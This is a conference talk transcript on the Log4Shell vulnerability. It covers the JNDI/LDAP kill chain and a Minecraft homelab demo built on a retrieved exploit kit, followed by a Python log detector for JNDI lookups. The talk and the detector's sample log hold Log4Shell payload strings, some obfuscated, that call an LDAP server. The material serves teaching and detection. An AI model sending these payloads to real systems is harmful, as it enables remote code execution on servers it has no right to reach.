And this is the last Log4j talk you'll ever need. So, a bit about who I am and what I do: I code, I teach, I hack. In other words, I spend most of my days, on work and off, bashing my head against the keyboard in the AppSec space, either to get code to work or to break other people's code, and in that concussive stupor I also try to stand on a podium, a stage, whatever, and give insights from my experiences to everyone else. I must add the disclaimer: although I do have an employer currently, I do not speak for the corporate hive mind. I am just one of its many cogs.

So, moving on to what we're talking about. On your left you see one of the most popular logging libraries in Java, and on the right you see your ticket to shells. It's all about a pocket full of shells. Do take note of the CVE; don't get it confused with any of the other ones, like for example CVE-45046 or any of the others. They're nice, they're good, they're ways of exploiting systems, but the problem is they require effort, and that's not what we came here for. Log4Shell isn't about effort and insight; it's about getting arbitrary remote code execution anywhere and everywhere.

So if you want to see the magical payload of what it takes to actually exploit Log4Shell, here it is. It is just the JNDI LDAP location via the IP, the port and the path to the exploit. Let's just take a deep dive and look into it. Unlike most acronyms in IT, LDAP and JNDI are actually useful for explaining what they are. So, LDAP: you'll see tutorials, classes, seminars everywhere about that. The long and short of it is that LDAP, the Lightweight Directory Access Protocol, is just file operations over TCP/IP. That's just using internet web requests: how do you move files, delete files, create and edit files? Your basic file operations that you find on the desktop; how do you do the same thing online? And JNDI is just the Java Naming and Directory Interface. So why do you need to use JNDI?
Why would anyone use JNDI in the first place? Code reusability is the number one reason. So in each new project you don't want to define basic things like shared libraries or database connections, configurations, templates, or, for example, setting which logging server you want to use. You kind of want to have that code easily be reused throughout multiple projects, and the combination of these two, both LDAP and JNDI, helps facilitate that functionality.

So, just to dive deeper into the weeds: LDAP is the number one provider for the JNDI SPI. So you've got your Java application globally, and then the JNDI API and the naming manager. One of the best ways to explain the use case of JNDI is DNS. Remember, in DNS you don't memorize a series of octets and just route to them manually through your browser. What you do instead is use a human-friendly identifier like a hostname, so defcon.org, google.com, etc., and then the DNS service routes the human-friendly name to the machine-readable identifier. It's the same thing with JNDI. You don't always know the exact path of classes and objects within the code base, so JNDI is really useful for designating that class path. If you go through the Oracle documentation for Java 7 and Java 8, LDAP is just the number one provider here, and so it's one of the most basic and most common use cases for doing something like that: reusing the same code and libraries throughout the project.

Now we go on to the kill chain.
So, for Log4Shell specifically, you either spin up your own local LDAP server, or you take over someone else's. Then you do anything within the context of the app that will cause it to log. This can include just modifying the body of a POST request, but most often what you'll see in the wild is just modifying a header, and a header that almost always gets logged is the User-Agent. And so when Log4Shell went out, if you wanted to walk around the internet and get random shells from everywhere, all you had to do was change the User-Agent to a local LDAP server or one hosted remotely that you own, and bam, you would get arbitrary connections.

The rest of the kill chain is that, just by including the payload, because the LDAP server is automatically trusted, the app will reach out to that server, and the server will send a JNDI response including the class, and then within that class you can inject into the process and get remote code execution from there. And that's the kill chain.

So, to facilitate this and make this a lot easier, I set up a homelab in Minecraft. It is built on Vagrant using Ubuntu and, because you want to, of course, one of the most popular Java applications out there. There are a number of benefits to this particular architecture over others. Namely, I don't have to code Java. I've spent days and weeks of my life trying to get things to compile with Maven and Gradle, and I don't want to do that. I promise you, I promise you, I'm a developer. It's just that for this particular project I'm just going to use Ruby, and by Ruby...
I mean just enough Ruby to get some bash scripts in there. A few works cited: all of these exploit kits are available on GitHub. The one exploit kit we're going to use, feihong-cs's JNDIExploit, actually was taken down by who knows who, but one of the benefits of that is that you can find this sketchy exploit kit through the Wayback Machine and then use it with our VM. There are plenty of exploit kits for the Log4Shell vulnerability; most of these will just automate and streamline the process of standing up your own JNDI-compatible LDAP server.

Shout out to DA667 on Twitter, mainly for the Minecraft version and the Java version, which is very important for this project. For Java I'm using OpenJDK 1.8.0 and making sure that the patch level is before 121, because from then onward arbitrary class loading is disabled by default. So yeah, not only do you have to have a vulnerable Java application, you have to have the vulnerable Java runtime, vulnerable Log4j, and, for this particular project, a vulnerable version of Minecraft, because as Mojang has discovered these things, it's gotten to the point where the basic date-time formatting that you normally were able to do in the chat, which is the dollar sign, curly bracket, "date" thing, it's gotten to the point where players are no longer able to execute basic things like that.

So, moving on: of course, with every sketchy exploit kit, use at your own risk.
That's why we're doing it. And without further ado, let's get into the demo.

All right, so hopping into the first command. You don't really need vagrant destroy -f at the beginning; really, all that was necessary is just the vagrant up and the vagrant reload. The vagrant up is to start the VM and the provisioners and get that started; the vagrant reload is just to, you know, reboot the VM and get the virtual machine working. Vagrant destroy -f is only needed if you need to blow it up and start again, as I had to do many, many times. So right now we've got the vagrant up just loading up the GUI, and all of this of course uses a Vagrant box. It's listed in the Vagrantfile, and all the provisioners are included within that GitHub repo as well. The first part is what's headless: the GUI, which is just the VirtualBox provider popping up. When you do it at home yourself, just don't try to mess with it or do anything. The first thing that'll start is the TTY. I wanted to make this demo as simple as possible, so I purposely made it simple enough to have the GUI start up before you do anything, because there's no sense in giving you a VM to just have to wrestle and fight with. I wasn't, though; I wasn't ultimately successful.
We'll see an error message that I'm still working out at the end. The next part of that is just downloading the Minecraft assets and the exploit kit, as I was talking about before. The particular script that I was using was the feihong-cs JNDIExploit, and of course there's an elegant solution involving, you know, cloning everything and all that, but since the repo was taken down, just curling the Wayback archive was the best bet here. The VM does appear to just, you know, stall and do nothing for a little while. The reason for that is that I just am tired of blowing up the terminal with arbitrary output; the apt-get installs are already bad enough. So what I did is just made this part quiet and silent. If you have some networking issues, of course this all crashes and fades away, but for the most part this is just getting all of the assets, installing not only the exploit kit but Java, making sure that all the environment variables are set, and these things are batched into stages for each of the provisioners. Onward. And then, shortly after, all of the Minecraft assets and the exploit kits are downloaded.
What we'll do is we'll just wait for the rest of it to install, then do a full reboot. One of the main provisioners that will always run is the serve.sh bash script. All it does is set up two screens: one will have the malicious LDAP server set up and the other one is going to have the Minecraft server set up. There is going to be a big error; I spent days and days on this, and for some reason graphics and driver issues just would not get out of the way of this build. But the server starts and everything else is fine. The EULA acceptance script is pretty easy to get around, and you can dive into all the details when you see it in the repo. For right now we're just booting up the VM, and now that we've got a GUI, just log in with the Vagrant default credentials and get started. Another part of the setup is that, now that the migration has happened, you have to have a Minecraft account. It's explicitly set aside for this. Yeah, just a jump cut to avoid throwing the password out there. Let's go. And of course, just so many, so many loading screens.

The Java version, which is not shown, is OpenJDK 1.8.0 with a patch level before 121, and for this particular installation of Minecraft I really want to target 1.12.2. It's very popular; obviously it's legacy, and one of the reasons is the modding community. So we're just going to hit play and agree. Now, the one error that was a complete showstopper, I don't know why, I'm thinking it's the distro or whatever, and we can get to the other one, is just an ArrayIndexOutOfBounds, which I included in the repo. Yeah, I promise you I got this working in a previous YouTube video, and we'll just pull up the screenshots for those and discuss that instead. But yeah, after this loads up, it's just an ArrayIndexOutOfBounds error. For some reason it just cannot find the primary display.
So, graphics and display driver issues are just par for the course for pretty much any Linux distribution. So yeah, it's just graphics driver issues, and by the time I got this recording in I did not have this issue resolved. I am hoping that by the time I present this in person the issue is resolved. Yeah, par for the course for Linux graphics driver issues. So alternative solutions would probably be to run this on jammy64 instead of bionic, which is what I did on YouTube. And if you hold up a second, the error message should pop up ever so slightly: it's a NullPointerException, and for some reason this particular install and configuration can't find OpenGL, even though my display and everything works fine. I've covered it up, but that quick pop-up for a second was a NullPointerException, and the full stack trace of course is available on GitHub.

The first screenshot is the actual payload within the context of Minecraft. This is taken, obviously, from the YouTube video that I did for the project when I recorded it in December. The IP address is just, you know, the network configuration for this particular virtual machine. The base64-encoded payload is just "ls", the ls command, and what you see on the right is the stack trace within the game. This is not the stack trace; these are the server logs, and you see that class name "foo"; that's the JNDI output of uploading the class name. You can look into the exploit kit and you can use it for several other commands, base64-encoded and otherwise. And that's it.

So let's talk about the impact here.
I mean, after all, Minecraft isn't really a good scenario for simulating the enterprise impact of Log4Shell. After all, it is an application based on a popular cross-platform framework, hosted publicly, with legacy dependencies, a user base of hundreds if not thousands of users at one time, and it actually has resisted updates and changes because it has a consistent revenue stream. So yeah, Minecraft is of course never a good example.

So what about remediation? How about fixing this? It's easy to say just patch your systems; that's the number one key thing. The logging version of Log4j is configurable: go into the configuration settings and do the patch. Otherwise, most of the Apache projects have already updated; it's no longer considered a zero-day. However, some arbitrary application that's built on Apache services may not be patched, in which case this is one of those things, like arbitrary remote code execution being exploited in the wild, where, as security practitioners, as professionals, you could say, nah, just change your technology stack. That is the best answer, the best way we can go forward with that. There have been other ways of trying to remediate, using regex and all that, but really, seriously, just patch to the later 2.1x releases of Log4j and move on.

The reason why this talk is called the last Log4j talk rather than the last Log4Shell talk is that it's really easy, when a huge vulnerability comes from a particular library, to think that the library itself has no functionality or utility.
It's all about the number one global vulnerability. That's sort of part of the risk with free and open source software. However, this is just one of those cases where one simple little library forms the backbone of digital infrastructure globally and worldwide. You may think, if you're doing penetration tests and offensive security, you'll find things like, for example, jQuery and others, where it seems like instantaneously these libraries are vulnerable; it blows up your scan logs and servers, because there's always a security patch coming. That's not necessarily a vulnerability; it is actually part of the feature. And so, it's not just part of the remediation process; part of what makes good application security work in the world is just having a development and training community that is in line and coupled with the security community, so that when something comes up, the security patches are rolled into the release.

The Log4j developers actually did their best. Before, it was just disabling and all of that, but as the entire world had scrutiny on this one library for a period of a few weeks, it eventually got the pushback to remove the arbitrary JNDI lookup functionality altogether, which is... I know it seems obvious, it seems insane. Why would you trust arbitrary lookups? Remember, it was a feature of the library pretty much until November. So part of going forward, part of the lessons learned, is that for every free and open source library package you could find, part of it is not only just its feature set but also looking into the community. Does it release security patches often? Is it well maintained, well funded? Is this something that you want to be able to integrate within your own technology stack?
And of course these links are active in pretty much way too many places. It's free of cost, so feel free to harass me on any of these platforms. And my favorite part of the talk, the AMA portion. So if you have a question about the setup, what I did, and also mistakes that I made, feel free.
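The kill chain above hinges on one thing a defender can watch for: a JNDI lookup string arriving in a field the application logs, most often the User-Agent. The following detector is an added example, not code from the talk or from the homelab repo. It scans web-server access lines in the combined log format, checks the request line, Referer and User-Agent for a lookup that resolves to ${jndi:<scheme>:...}, and, because Log4j evaluates nested lookups before the JNDI one, it first collapses the ${lower:...}, ${upper:...} and ${x:-y} default-value forms so that a rule matching only the literal text would not miss them. The IPs, timestamps and lines are constructed (192.0.2.10 is a documentation address), and a line that cannot be parsed is still scanned as raw text rather than skipped.

```python
import re
from typing import Dict, List

# Innermost lookup forms that Log4j resolves before the outer ${jndi:...} one.
_LOWER = re.compile(r"\$\{\s*lower\s*:\s*([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{\s*upper\s*:\s*([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")  # ${name:-default} -> default
# The resolved form we actually alert on; captures the URI scheme (ldap, rmi, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)

# Combined log format: ip ident user [ts] "request" status size "referer" "user-agent"
_ACCESS = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def normalize(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups, innermost first, until nothing changes."""
    prev, rounds = None, 0
    while prev != text and rounds < max_rounds:
        prev = text
        text = _LOWER.sub(lambda m: m.group(1).lower(), text)
        text = _UPPER.sub(lambda m: m.group(1).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
        rounds += 1
    return text


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per logged field whose normalized value carries a JNDI lookup."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        m = _ACCESS.match(line)
        if m:
            ip = m.group("ip")
            fields = {"req": m.group("req"), "ref": m.group("ref"), "ua": m.group("ua")}
        else:
            # Unparseable line: do not drop it, scan the whole thing.
            ip, fields = "?", {"raw_line": line}
        for name, value in fields.items():
            norm = normalize(value)
            hit = _JNDI.search(norm)
            if hit:
                findings.append({
                    "line": str(lineno), "ip": ip, "field": name,
                    "scheme": hit.group(1).lower(), "raw": value, "normalized": norm,
                })
    return findings


# Constructed sample: one clean request, three lookup attempts in different fields,
# one harmless ${date} lookup (the Minecraft chat case), and one garbled line.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://192.0.2.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:19 +0000] "GET /?q=${${lower:j}ndi:${lower:ldap}://192.0.2.10:1389/a} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:23 +0000] "POST /login HTTP/1.1" 302 0 "${${::-j}${::-n}${::-d}${::-i}:ldap://192.0.2.10:1389/a}" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:14:02:30 +0000] "GET /chat HTTP/1.1" 200 88 "-" "${date:yyyy-MM-dd}"',
    'garbled line without structure ${jndi:ldap://192.0.2.10:1389/a}',
]


def main() -> None:
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} ip={f['ip']} field={f['field']} scheme={f['scheme']}: {f['normalized']}")


if __name__ == "__main__":
    main()
```

Run against the constructed sample it reports four findings (User-Agent, request line, Referer and the garbled line) and stays quiet on the plain browser request and on the ${date:...} lookup, which is the distinction the remediation section turns on: not every lookup string is Log4Shell, only one that resolves to a jndi: lookup pointing at a server you do not control.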